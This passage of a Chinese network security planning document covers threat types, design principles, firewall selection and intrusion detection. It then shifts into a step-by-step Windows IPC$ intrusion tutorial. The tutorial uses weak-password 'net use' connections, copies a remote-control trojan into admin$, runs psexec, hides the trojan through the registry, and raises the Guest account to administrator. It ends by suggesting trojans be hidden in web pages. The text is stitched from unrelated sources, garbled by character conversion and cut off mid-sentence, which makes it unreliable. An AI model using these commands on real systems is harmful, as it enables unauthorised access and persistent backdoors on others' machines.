67、權(quán)限，越權(quán)訪問信息。它主要有以下幾種形式：假冒、身份攻擊、非法用戶進(jìn)入網(wǎng)絡(luò)系統(tǒng)進(jìn)行違法操作、合法用戶以未授權(quán)方式進(jìn)行操作等。</p><p>　　信息泄漏或丟失：指敏感數(shù)據(jù)在有意或無意中被泄漏出去或丟失，它通常包括，信息在傳輸中丟失或泄漏（如"黑客"們利用電磁泄漏或搭線竊聽等方式可截獲機密信息，或通過對信息流向、流量、通信頻度和長度等參數(shù)的分析，推出有用信息，如用戶口令、賬號等重要信息。），信

68、息在存儲介質(zhì)中丟失或泄漏，通過建立隱蔽隧道等竊取敏感信息等。</p><p>　　破壞數(shù)據(jù)完整性：以非法手段竊得對數(shù)據(jù)的使用權(quán)，刪除、修改、插入或重發(fā)某些重要信息，以取得有益于攻擊者的響應(yīng)；惡意添加，修改數(shù)據(jù)，以干擾用戶的正常使用。</p><p>　　拒絕服務(wù)攻擊：它不斷對網(wǎng)絡(luò)服務(wù)系統(tǒng)進(jìn)行干擾，改變其正常的作業(yè)流程，執(zhí)行無關(guān)程序使系統(tǒng)響應(yīng)減慢甚至癱瘓，影響正常用戶的使用，甚至使合法用戶被

69、排斥而不能進(jìn)入計算機網(wǎng)絡(luò)系統(tǒng)或不能得到相應(yīng)的服務(wù)。</p><p>　　利用網(wǎng)絡(luò)傳播病毒：通過網(wǎng)絡(luò)傳播計算機病毒，其破壞性大大高于單機系統(tǒng)，而且用戶很難防范。</p><p>　?。?）網(wǎng)絡(luò)安全的系統(tǒng)目標(biāo)</p><p>　　1、建立網(wǎng)絡(luò)防病毒系統(tǒng)</p><p>　　2、建立入侵檢測系統(tǒng)</p><p>　　3、建立

70、漏洞掃描系統(tǒng)</p><p>　　4、合理進(jìn)行VLAN劃分</p><p>　　5、IP地址與MAC地址的綁定</p><p><b>　　總體規(guī)劃</b></p><p>　?。ㄒ唬?安全體系結(jié)構(gòu) </p><p><b>　　1. 網(wǎng)絡(luò)結(jié)構(gòu)安全</b></p>

71、;<p>　　2. 加強訪問控制 3. 安全檢測 </p><p>　?。ǘ┌踩w系設(shè)計 </p><p>　　1. 網(wǎng)絡(luò)結(jié)構(gòu)安全　　網(wǎng)絡(luò)結(jié)構(gòu)布局的合理與否，也影響著網(wǎng)絡(luò)的安全性。對銀行系統(tǒng)業(yè)務(wù)網(wǎng)、辦公網(wǎng)、與外單位互聯(lián)的接口網(wǎng)絡(luò)之間必須按各自的應(yīng)用范圍、安全保密程度進(jìn)行合理分布，以免局部安全性較低的網(wǎng)絡(luò)系統(tǒng)造成的威脅，傳播到整個網(wǎng)絡(luò)系統(tǒng)?！　?. 加強訪問控

72、制　　1) 如果銀行系統(tǒng)有上Internet公網(wǎng)的需求，則從安全性考濾，銀行業(yè)務(wù)系統(tǒng)網(wǎng)絡(luò)必須與Internet公網(wǎng)物理隔離。解決方法可以是兩個網(wǎng)絡(luò)之間完全斷開或者通過物理安全隔離卡來實現(xiàn)?！　?) 網(wǎng)結(jié)構(gòu)合理分布后，在內(nèi)部局網(wǎng)內(nèi)可以通過交換機劃分VLAN功能來實現(xiàn)不同部門、不同級別用戶之間簡單的訪問控制。　　3) 內(nèi)部局域網(wǎng)與外單位網(wǎng)絡(luò)、內(nèi)部局域網(wǎng)與不信任域網(wǎng)絡(luò)之間可以通過配備防火墻來實現(xiàn)內(nèi)、外網(wǎng)或不同信任域之間的隔離與訪問控制。

73、　　4) 根據(jù)企業(yè)具體應(yīng)用，也可以配備應(yīng)用層的訪問控制軟件系統(tǒng)，針對局域網(wǎng)具體的應(yīng)用進(jìn)行更細(xì)致的訪問控制?！　?) 對于遠(yuǎn)程拔號訪問用戶的安全性訪問，可以利用防火墻的一次性口令認(rèn)證機制，對遠(yuǎn)程拔號用戶進(jìn)行身份認(rèn)證，實遠(yuǎn)程用戶的安全訪問。　　3. 安全檢測　 　由于防火墻等安全控制系統(tǒng)都屬于靜態(tài)防護(hù)安</p><p>　?。ㄈ┚W(wǎng)絡(luò)安全體系原則</p><p>　　針對每一類安全風(fēng)險

74、，結(jié)合校園網(wǎng)的實際情況，將具體的分析網(wǎng)絡(luò)的安全風(fēng)險。根據(jù)防范安全攻擊的安全需求、需要達(dá)到的安全目標(biāo)、對應(yīng)安全機制所需的安全服務(wù)等因素，參照SSE-CMM("系 統(tǒng)安全工程能力成熟模型")和ISO17799(信息安全管理標(biāo)準(zhǔn))等國際標(biāo)準(zhǔn)，綜合考慮可實施性、可管理性、可擴展性、綜合完備性、系統(tǒng)均衡性等方面，網(wǎng)絡(luò)安全防范體系在整體設(shè)計過程中應(yīng)遵循以下9項原則： </p><p>　　1．網(wǎng)絡(luò)信息安全

75、的木桶原則 </p><p>　　網(wǎng)絡(luò)信息安全的木桶原則是指對信息均衡、全面的進(jìn)行保護(hù)?！澳就暗淖畲笕莘e取決于最短的一塊木板”。網(wǎng)絡(luò)信息系統(tǒng)是一個復(fù)雜的計算機系統(tǒng)，它本身在物理上、操作上和管理上的種種漏洞構(gòu)成了系統(tǒng)的安全脆弱性，尤其是多用戶網(wǎng)絡(luò)系統(tǒng)自身的復(fù)雜性、資源共享性使單純的技術(shù) 保護(hù)防不勝防。攻擊者使用的“最易滲透原則”，必然在系統(tǒng)中最薄弱的地方進(jìn)行攻擊。因此，充分、全面、完整地對系統(tǒng)的安全漏洞和安全威脅進(jìn)

76、行分析，評估和 檢測（包括模擬攻擊）是設(shè)計信息安全系統(tǒng)的必要前提條件。安全機制和安全服務(wù)設(shè)計的首要目的是防止最常用的攻擊手段，根本目的是提高整個系統(tǒng)的"安全最低點"的安全性能。 </p><p>　　2．網(wǎng)絡(luò)信息安全的整體性原則 </p><p>　　要求在網(wǎng)絡(luò)發(fā)生被攻擊、破壞事件的情況下，必須盡可能地快速恢復(fù)網(wǎng)絡(luò)信息中心的服務(wù)，減少損失。因此，信息安全系統(tǒng)應(yīng)該包括安全

77、防護(hù)機制、安全檢測機制和安全恢復(fù)機制。安全防護(hù)機制是根據(jù)具體系統(tǒng)存在的各種安全威脅采取的相應(yīng)的防護(hù)措施，避免非法攻擊的進(jìn)行。安全檢 測機制是檢測系統(tǒng)的運行情況，及時發(fā)現(xiàn)和制止對系統(tǒng)進(jìn)行的各種攻擊。安全恢復(fù)機制是在安全防護(hù)機制失效的情況下，進(jìn)行應(yīng)急處理和盡量、及時地恢復(fù)信息，減少供給的破壞程度。 </p><p>　　3．安全性評價與平衡原則 </p><p>　　對任何網(wǎng)絡(luò)，絕對安全難以達(dá)

78、到，也不一定是必要的，所以需要建立合理的實用安全性與用戶需求評價與平衡體系。安全 體系設(shè)計要正確處理需求、風(fēng)險與代價的關(guān)系，做到安全性與可用性相容，做到組織上可執(zhí)行。評價信息是否安全，沒有絕對的評判標(biāo)準(zhǔn)和衡量指標(biāo)，只能決定于系統(tǒng)的用戶需求和具體的應(yīng)用環(huán)境，具體取決于系統(tǒng)的規(guī)模和范圍，系統(tǒng)的性質(zhì)和信息的重要程度。 </p><p>　　4．標(biāo)準(zhǔn)化與一致性原則 </p><p>　　系統(tǒng)是一個

79、龐大的系統(tǒng)工程，其安全體系的設(shè)計必須遵循一系列的標(biāo)準(zhǔn)，這樣才能確保各個分系統(tǒng)的一致性，使整個系統(tǒng)安全地互聯(lián)互通、信息共享。 </p><p>　　5．技術(shù)與管理相結(jié)合原則 </p><p>　　安全體系是一個復(fù)雜的系統(tǒng)工程，涉及人、技術(shù)、操作等要素，單靠技術(shù)或單靠管理都不可能實現(xiàn)。因此，必須將各種安全技術(shù)與運行管理機制、人員思想教育與技術(shù)培訓(xùn)、安全規(guī)章制度建設(shè)相結(jié)合。 </p>

80、<p>　　6．統(tǒng)籌規(guī)劃，分步實施原則 </p><p>　　由于政策規(guī)定、服務(wù)需求的不明朗，環(huán)境、條件、時間的變化，攻擊手段的進(jìn)步，安全防護(hù)不可能一步到位，可在一個比 較全面的安全規(guī)劃下，根據(jù)網(wǎng)絡(luò)的實際需要，先建立基本的安全體系，保證基本的、必須的安全性。隨著今后隨著網(wǎng)絡(luò)規(guī)模的擴大及應(yīng)用的增加，網(wǎng)絡(luò)應(yīng)用和復(fù)雜程 度的變化，網(wǎng)絡(luò)脆弱性也會不斷增加，調(diào)整或增強安全防護(hù)力度，保證整個網(wǎng)絡(luò)最根本的安全需求

81、。 </p><p><b>　　7．等級性原則 </b></p><p>　　等級性原則是指安全層次和安全級別。良好的信息安全系統(tǒng)必然是分為不同等級的，包括對信息保密程度分級，對用戶操 作權(quán)限分級，對網(wǎng)絡(luò)安全程度分級（安全子網(wǎng)和安全區(qū)域），對系統(tǒng)實現(xiàn)結(jié)構(gòu)的分級（應(yīng)用層、網(wǎng)絡(luò)層、鏈路層等），從而針對不同級別的安全對象，提供全面、可 選的安全算法和安全體制，以滿足網(wǎng)絡(luò)中

82、不同層次的各種實際需求。 </p><p><b>　　8．動態(tài)發(fā)展原則 </b></p><p>　　要根據(jù)網(wǎng)絡(luò)安全的變化不斷調(diào)整安全措施，適應(yīng)新的網(wǎng)絡(luò)環(huán)境，滿足新的網(wǎng)絡(luò)安全需求。 </p><p><b>　　9．易操作性原則 </b></p><p>　　首先，安全措施需要人為去完成，如果措施

83、過于復(fù)雜，對人的要求過高，本身就降低了安全性。其次，措施的采用不能影響系統(tǒng)的正常運行。 </p><p>　　由于互聯(lián)網(wǎng)絡(luò)的開放性和通信協(xié)議的安全缺陷，以及在網(wǎng)絡(luò)環(huán)境中數(shù)據(jù)信息存儲和對其訪問與處理的分布性特點，網(wǎng)上傳 輸?shù)臄?shù)據(jù)信息很容易泄露和被破壞，網(wǎng)絡(luò)受到的安全攻擊非常嚴(yán)重，因此建立有效的網(wǎng)絡(luò)安全防范體系就更為迫切。實際上，保障網(wǎng)絡(luò)安全不但需要參考網(wǎng)絡(luò)安全的 各項標(biāo)準(zhǔn)以形成合理的評估準(zhǔn)則，更重要的是必須明確網(wǎng)絡(luò)

84、安全的框架體系、安全防范的層次結(jié)構(gòu)和系統(tǒng)設(shè)計的基本原則，分析網(wǎng)絡(luò)系統(tǒng)的各個不安全環(huán)節(jié)，找到安 全漏洞，做到有的放矢。 </p><p>　?。ㄋ模┌踩a(chǎn)品選型原則</p><p>　　從總體的設(shè)計安全產(chǎn)品中，沒有一種產(chǎn)品是適用于所有的環(huán)境的，因此，在選擇防火墻時，應(yīng)根據(jù)網(wǎng)絡(luò)和站點的特點來選擇。</p><p>　　1. 如果站點對保密性要求高，應(yīng)選擇有強大認(rèn)證功能的

85、防火墻，如代理服務(wù)器或混合性防火墻；</p><p>　　2. 如需要較高的網(wǎng)絡(luò)通信效率，網(wǎng)絡(luò)接入寬帶較高，又只需保障基本的安全性能，則包過濾式較好的選擇；</p><p>　　3. 如果站點連接到英特網(wǎng)上僅是為了接受電子郵件，則根本不需要防火墻</p><p>　　在決定用防火墻來實施網(wǎng)絡(luò)的安全策略后，不管具體的實施原理是什么，良好的防火墻一般應(yīng)具備以下功能：&l

86、t;/p><p>　?。?）. 本身支持安全策略</p><p>　?。?）. 當(dāng)網(wǎng)絡(luò)的安全策略改變時，可加入新服務(wù)</p><p>　　（3）. 必要時能運用過濾技術(shù)來允許和禁止服務(wù)</p><p>　?。?）. 有先進(jìn)的認(rèn)證手段，或可以安裝先進(jìn)的認(rèn)證方法</p><p>　　（5）. 能支持除非明確允許，否則就禁止先進(jìn)

87、的認(rèn)證方法</p><p>　?。?）. 可使用FTP和Telnet（遠(yuǎn)程登錄）等服務(wù)代理</p><p>　?。?）. 能根據(jù)數(shù)據(jù)包的性質(zhì)進(jìn)行包過濾</p><p>　　（8）. 允許公眾對站點的訪問</p><p>　?。?）. 能把信息服務(wù)器和其它內(nèi)部服務(wù)器分開</p><p><b>　　安全方案設(shè)計

88、</b></p><p>　　通過對網(wǎng)絡(luò)的全面了解，按照安全策略的要求、風(fēng)險分析的結(jié)果及整個網(wǎng)絡(luò)的安全目標(biāo)，整個網(wǎng)絡(luò)措施應(yīng)按系統(tǒng)體系建立。具體由系統(tǒng)實施以下幾個方面構(gòu)成：入侵檢測技術(shù)，防火墻安全技術(shù)，交換機端口隔離技術(shù)和路由器技術(shù)。</p><p>　　(一)利用入侵檢測技術(shù)實施安全防護(hù)</p><p>　　James Aderson在1980年使用了“

89、威脅”概述術(shù)語，其定義與入侵含義相同。將入侵企圖或威脅定義未經(jīng)授權(quán)蓄意嘗試訪問信息、竄改信息、使系統(tǒng)不可靠或不能使用。Heady給出定外的入侵定義，入侵時指任何企圖破壞資源的完整性、機密性及可用性的活動集合。Smaha從分類角度指出入侵包括嘗試性闖入、偽裝攻擊、安全控制系統(tǒng)滲透、泄漏、拒絕服務(wù)、惡意使用六種類型。</p><p>　　從技術(shù)上入侵檢測系統(tǒng)可分為異常檢測型和誤用檢測型兩大類。異常入侵檢測是指能夠根據(jù)

90、異常行為和使用計算機資源情況檢測出來的入侵。異常檢測試圖用定量方式描述可接受的行為特征，以區(qū)別非正常的、潛在入侵性行為。誤用入侵檢測是指利用已知系統(tǒng)和應(yīng)用軟件的弱點攻擊模式來檢測入侵。與異常入侵檢測相反，誤用入侵檢測能直接檢測不利的或不可接受的行為，而異常入侵檢測是檢查同正常行為相違背的行為。從系統(tǒng)結(jié)構(gòu)上分，入侵檢測系統(tǒng)大致可以分為基于主機型、基于網(wǎng)絡(luò)型和基于主體型三種。</p><p>　　基于主機入侵檢測系統(tǒng)

91、為早期的入侵檢測系統(tǒng)結(jié)構(gòu)、其檢測的目標(biāo)主要是主機系統(tǒng)和系統(tǒng)本地用戶。檢測原理是根據(jù)主機的審計數(shù)據(jù)和系統(tǒng)的日志發(fā)現(xiàn)可疑事件，檢測系統(tǒng)可以運行在被檢測的主機上。這種類型系統(tǒng)依賴于審計數(shù)據(jù)或系統(tǒng)日志準(zhǔn)確性和完整性以及安全事件的定義。若入侵者設(shè)法逃避設(shè)計或進(jìn)行合作入侵，則基于主機檢測系統(tǒng)就暴露出其弱點，特別是在現(xiàn)在的網(wǎng)絡(luò)環(huán)境下。單獨地依靠主機設(shè)計信息進(jìn)行入侵檢測難以適應(yīng)網(wǎng)絡(luò)安全的需求。這主要表現(xiàn)，一是主機的審計信息弱點，如易受攻擊，入侵者可通過

92、通過使用某些系統(tǒng)特權(quán)或調(diào)用比審計本身更低級的操作來逃避審計。二是不能通過分析主機審計記錄來檢測網(wǎng)絡(luò)攻擊（域名欺騙、端口掃描等）。因此，基于網(wǎng)絡(luò)入侵檢測系統(tǒng)對網(wǎng)絡(luò)安全是必要的，這種檢測系統(tǒng)根據(jù)網(wǎng)絡(luò)流量、協(xié)議分析、簡單網(wǎng)絡(luò)管理協(xié)議信息等數(shù)據(jù)檢測入侵。主機和網(wǎng)絡(luò)型的入侵檢測系統(tǒng)是一個統(tǒng)一集中系統(tǒng)，但是，隨著網(wǎng)絡(luò)系統(tǒng)結(jié)構(gòu)復(fù)雜化和大型化，系統(tǒng)的弱點或漏洞將趨向于分布式。另外，入侵行為不再是單一的行為，而是表現(xiàn)出相互協(xié)作入侵特點。入侵檢測系統(tǒng)要求可

93、適應(yīng)性、可訓(xùn)練性、高效性、容錯性、可擴展性等要求。不同的IDS之間也需要共享信息，協(xié)作檢測。于是，美</p><p>　　對于入侵檢測系統(tǒng)評估，主要性能指針有：</p><p>　　a.可靠性，系統(tǒng)具有容錯能力和可連續(xù)運行；</p><p>　　b.可用性，系統(tǒng)開銷要最小，不會嚴(yán)重降低網(wǎng)絡(luò)系統(tǒng)性能；</p><p>　　c.可測試，通過攻擊可

94、以檢測系統(tǒng)運行；</p><p>　　d.適應(yīng)性，對系統(tǒng)來說必須是易于開發(fā)和添加新的功能，能隨時適應(yīng)系統(tǒng)環(huán)境的改變；e.實時性，系統(tǒng)能盡快地察覺入侵企圖以便制止和限制破壞； </p><p>　　f.準(zhǔn)確性，檢測系統(tǒng)具有低的誤警率和漏警率；</p><p>　　g.安全性，檢測系統(tǒng)必須難于被欺騙和能夠保護(hù)自身安全。</p><p>　　1、建

95、立ipc$連接在hack攻擊中的作用</p><p>　　利用IPC$,連接者甚至可以與目標(biāo)主機建立一個空的連接而無需用戶名與密碼(當(dāng)然,對方機器必須開了ipc$共享,否則你是連接不上的)，而利用這個空的連接，連接者還可以得到目標(biāo)主機上的用戶列表(不過負(fù)責(zé)的管理員會禁止導(dǎo)出用戶列表的)。</p><p>　　就像上面所說的,即使建立了一個空的連接,也可以獲得不少的信息(而這些信息往往是入侵

96、中必不可少的),訪問部分共享,如果能夠以某一個具有一定權(quán)限的用戶身份登陸的話,那么就會得到相應(yīng)的權(quán)限。基本上可以總結(jié)為獲取目標(biāo)信息、管理目標(biāo)進(jìn)程和服務(wù),上傳木馬并運行,如果是2000server，還可以考慮開啟終端服務(wù)方便控制.雖然會有一些傻傻的管理員用空口令或者弱智密碼,但這畢竟是少數(shù),而且現(xiàn)在不比從前了,隨著人們安全意識的提高,管理員們也愈加小心了,得到管理員密碼會越來越難的。</p><p>　　因此今后最

97、大的可能就是以極小的權(quán)限甚至是沒有權(quán)限進(jìn)行連接,就會慢慢的發(fā)現(xiàn)ipc$連接并不是萬能的,甚至在主機不開啟ipc$共享時,就無法連接。</p><p>　　所以不要把ipc$入侵當(dāng)作終極武器,不要認(rèn)為它戰(zhàn)無不勝,它就像是足球場上射門前的傳球,很少會有致命一擊的效果,但卻是不可缺少的,這才是ipc$連接在hack入侵中的意義所在。</p><p>　　2、 ipc$與空連接,139,445端口

98、,默認(rèn)共享的關(guān)系 </p><p>　　(1) ipc$與空連接: </p><p>　　不需要用戶名與密碼的ipc$連接即為空連接,一旦你以某個用戶或管理員的身份登陸(即以特定的用戶名和密碼進(jìn)行ipc$連接),自然就不能叫做空連接了。 </p><p>　　(2) ipc$與139,445端口: </p><p>　　ipc$連接可以實現(xiàn)遠(yuǎn)

99、程登陸及對默認(rèn)共享的訪問;而139端口的開啟表示netbios協(xié)議的應(yīng)用,可以通過139,445(win2000)端口實現(xiàn)對共享文件/打印機的訪問,因此一般來講,ipc$連接是需要139或445端口來支持的。 </p><p>　　(3) ipc$與默認(rèn)共享 </p><p>　　默認(rèn)共享是為了方便管理員遠(yuǎn)程管理而默認(rèn)開啟的共享,即所有的邏輯盤(c$,d$,e$......)和系統(tǒng)目錄wi

100、nnt或windows(admin$),通過ipc$連接可以實現(xiàn)對這些默認(rèn)共享的訪問(前提是對方?jīng)]有關(guān)閉這些默認(rèn)共享)</p><p>　　3、如何打開目標(biāo)的IPC$</p><p>　　首先需要獲得一個不依賴于ipc$的shell，比如sql的cmd擴展、telnet、木馬,當(dāng)然，這shell必須是admin權(quán)限的,然后可以使用shell執(zhí)行命令 net share ipc$ 來開放目標(biāo)

101、的ipc$。從上面可以知道，ipc$能否使用還有很多條件。請確認(rèn)相關(guān)服務(wù)都已運行，沒有就啟動它（具體做法在net命令里很詳細(xì)）,還是不行的話（比如有防火墻，殺不了）無法用ipc$完成入侵。</p><p><b>　　4、入侵模式 </b></p><p><b>　　1 net use</b></p><p><b

102、>　　先用空連接試，</b></p><p>　　2 再用掃描軟件查看它的端口看后139和445端口都已經(jīng)打開</p><p>　　3 再掃描用戶名以及密碼(弱口令)</p><p>　　看到用戶名和密碼(太簡單)</p><p>　　4 C:>net use \192.168.0.3IPC$ "123&qu

103、ot; /user:"admintitrators" </p><p>　　這是用《流光》掃到的用戶名是administrators，密碼為"123"的IP地址，如果是打算攻擊的話，就可以用這樣的命令來與192.168.0.3建立一個連接，因為密碼為"123"，，后面一個雙引號里的是用戶名，輸入administrators，命令即可成功完成。 </

104、p><p>　　5 C:> copy aaa.reg \\192.168.0.3\admin$\speech</p><p>　　copy admdll.dll \\192.168.0.3\admin$\speech</p><p>　　copy raddrv.dll \\192.168.0.3\admin$\speech</p><p>

105、　　copy r_server.exe \\192.168.0.3\admin$\speech </p><p>　　先復(fù)r_server.exe,以及admdll.dll, raddrv.dll.和注冊表aaa.reg到目標(biāo)機windows\admin\speech的活頁夾下。</p><p>　　6 C:>net time \192.168.0.3 </p><

106、;p>　　查查時間，發(fā)現(xiàn)192.168.0.3 的當(dāng)前時間是 2008/12/19 上午 11:00，命令成功完成。</p><p>　　7 運行psexe進(jìn)到目標(biāo)機的dos下</p><p>　　8查看目標(biāo)機的ip地址</p><p>　　9進(jìn)入到傳了木馬的文檔夾下</p><p>　　10啟動r-server</p>

107、<p>　　11為了以后的方便，打通一個1234斷口并且設(shè)密碼為1234</p><p>　　12將注冊表導(dǎo)入，是為了隱藏木馬不在任務(wù)欄顯示</p><p><b>　　13啟動服務(wù)</b></p><p>　　14用admin連接看是成功的 </p><p>　　為了以防萬一,我們再把guest啟動加到管理組

108、 </p><p>　　15 C:>net user guest /active:yes 命令將對方的Guest用戶啟動</p><p>　　16 C:>net user guest 1234 命令將Guest的密碼改為1234</p><p>　　17 C:>net localgroup administrators guest /add <

109、;/p><p>　　將Guest變?yōu)锳dministrator(如果管理員密碼更改，guest賬號沒改變的話，下次我們可以用guest再次訪問這臺計算機)</p><p>　　但是看到了ipc$入侵有很大的局限性，所以通過internet入侵，可以隱藏木馬比如：把木馬加到網(wǎng)頁上，為了再隱藏它就把掛木馬的網(wǎng)頁加到視頻里。只要看視頻（前提是連網(wǎng)）網(wǎng)頁就會自動彈出。也就是打開了網(wǎng)頁，機子就中木馬，可